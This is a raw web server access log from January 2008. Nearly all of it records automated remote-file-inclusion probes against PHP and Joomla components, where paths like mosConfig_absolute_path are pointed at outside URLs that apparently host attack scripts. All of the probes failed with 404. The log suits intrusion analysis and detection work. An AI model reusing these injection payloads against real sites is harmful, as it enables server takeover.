87.117.233.130 - - [16/Jan/2008:13:45:00 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:13:46:40 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:13:46:40 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
68.106.12.13 - - [16/Jan/2008:13:47:18 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
212.241.168.186 - - [16/Jan/2008:13:48:02 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [16/Jan/2008:13:48:12 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:13:49:49 -0800] "GET //[flat_php_board_path]index.php?a=viewprofile&username=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:13:50:32 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:13:50:33 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:13:50:33 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.229.20 - - [16/Jan/2008:13:51:11 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.229.20 - - [16/Jan/2008:13:51:12 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.229.20 - - [16/Jan/2008:13:51:12 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.160 - - [16/Jan/2008:13:52:18 -0800] "GET //phpBB2//language/lang_german/lang_main_album.php?phpbb_root_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.160.31.2 - - [16/Jan/2008:13:52:48 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [16/Jan/2008:13:52:49 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [16/Jan/2008:13:52:50 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:13:53:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.61.135.106 - - [16/Jan/2008:13:54:58 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.61.135.106 - - [16/Jan/2008:13:54:59 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.61.135.106 - - [16/Jan/2008:13:54:59 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:13:56:58 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:57:25 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:57:26 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:57:26 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [16/Jan/2008:13:57:27 -0800] "GET /logs/access_071224.log//convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:02:54 -0800] "GET /logs/access_071212.log//[flat_php_board_path]index.php?a=viewprofile&username=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:14:03:30 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:14:03:31 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.143.206 - - [16/Jan/2008:14:03:32 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.103.8.13 - - [16/Jan/2008:14:03:39 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kadausa.org/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
128.103.8.13 - - [16/Jan/2008:14:03:39 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kadausa.org/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:14:04:17 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [16/Jan/2008:14:04:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.192.42 - - [16/Jan/2008:14:06:34 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.192.42 - - [16/Jan/2008:14:06:37 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.48.192.42 - - [16/Jan/2008:14:06:44 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath=http://www.ajir-sud.org/modules/tinycontent/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:14:08:55 -0800] "GET /tmp/sess_3d4c3880bdacccd0de3b408052522ecd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:14:08:56 -0800] "GET /tmp/sess_cc488fe171d98ce77f6d96b4fc587725 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
38.102.88.137 - - [16/Jan/2008:14:09:08 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ita-robocon.com/zc/media/install.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.137 - - [16/Jan/2008:14:09:08 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ita-robocon.com/zc/media/install.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.137 - - [16/Jan/2008:14:09:08 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ita-robocon.com/zc/media/install.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:11:10 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:11:14 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:11:20 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:14:13:19 -0800] "GET //modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.catim.com/legislacao/.bht/c99.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:14:13:19 -0800] "GET /logs//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.catim.com/legislacao/.bht/c99.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:14:49 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:14:58 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:15:02 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:15:04 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:15:08 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:15:11 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:15:38 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:15:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:17:29 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:14:20:01 -0800] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:14:20:01 -0800] "GET /index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:14:20:01 -0800] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:14:20:01 -0800] "GET /index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:14:20:08 -0800] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:14:20:08 -0800] "GET /index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.137 - - [16/Jan/2008:14:21:17 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:14:22:30 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.catim.com/legislacao/.bht/c99.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:14:22:30 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.catim.com/legislacao/.bht/c99.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:14:23:03 -0800] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.12.121 - - [16/Jan/2008:14:23:04 -0800] "GET /index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:25:24 -0800] "GET /logs/access_071229.log//calendar.php?s=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:25:30 -0800] "GET //calendar.php?s=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [16/Jan/2008:14:25:37 -0800] "GET /logs//calendar.php?s=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [16/Jan/2008:14:33:30 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [16/Jan/2008:14:33:31 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.98.160 - - [16/Jan/2008:14:34:18 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
83.223.98.160 - - [16/Jan/2008:14:34:18 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:14:37:34 -0800] "GET /tmp/sess_b6279367c8b69e95bdfb12651e63da55 HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:37:54 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:37:55 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:37:55 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:37:57 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
59.106.19.18 - - [16/Jan/2008:14:38:48 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:40:09 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:41:09 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:41:09 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:41:09 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:14:41:11 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.65.126.118 - - [16/Jan/2008:14:41:11 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geldstarter.de/phpBB/s1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:41:27 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:41:27 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:41:28 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.147.74 - - [16/Jan/2008:14:42:14 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://83.19.144.26/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [16/Jan/2008:14:42:14 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://83.19.144.26/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [16/Jan/2008:14:42:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://83.19.144.26/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:14:44:12 -0800] "GET /bikes/GPS/ HTTP/1.1" 200 677 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:44:25 -0800] "GET /logs/access_080101.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.139 - - [16/Jan/2008:14:45:40 -0800] "GET /megumi/Bracelet/?S=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.106.19.18 - - [16/Jan/2008:14:49:17 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [16/Jan/2008:14:49:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.167 - - [16/Jan/2008:14:51:05 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:53:50 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:53:50 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:14:53:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:14:55:23 -0800] "GET /logs/access_071219.log//components/com_simpleboard/file_upload.php?sbp=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:14:55:23 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [16/Jan/2008:14:55:23 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.128 - - [16/Jan/2008:14:56:27 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
193.34.68.128 - - [16/Jan/2008:14:56:27 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.251.15.100 - - [16/Jan/2008:14:56:32 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.251.15.100 - - [16/Jan/2008:14:56:32 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.251.15.100 - - [16/Jan/2008:14:56:32 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:14:56:49 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:14:56:49 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [16/Jan/2008:14:56:49 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:14:56:51 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:14:56:52 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
